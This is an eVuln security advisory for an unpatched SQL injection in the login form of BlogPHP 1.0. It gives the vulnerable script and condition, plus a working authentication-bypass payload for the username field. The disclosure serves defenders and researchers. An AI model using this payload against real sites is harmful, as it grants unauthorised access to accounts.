New eVuln Advisory:
BlogPHP Authentication Bypass
http://evuln.com/vulns/34/summary.html

--------------------Summary----------------

Software: BlogPHP
Sowtware's Web Site: http://www.blogphp.net/
Versions: 1.0
Critical Level: Harmless
Type: SQL Injection
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com)
eVuln ID: EV0034

-----------------Description---------------
Vulnerable scripts: 
index.php 

Variable $_POST[username] isn't properly sanitized before being used in
a SQL query. 

Condition: magic_quotes_gpc = off

--------------Exploit----------------------
Link: 
http://host/index.php?act=login 

username: a' or 1/* 
password: anypassword 


--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Original Advisory:
http://evuln.com/vulns/34/summary.html

Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com)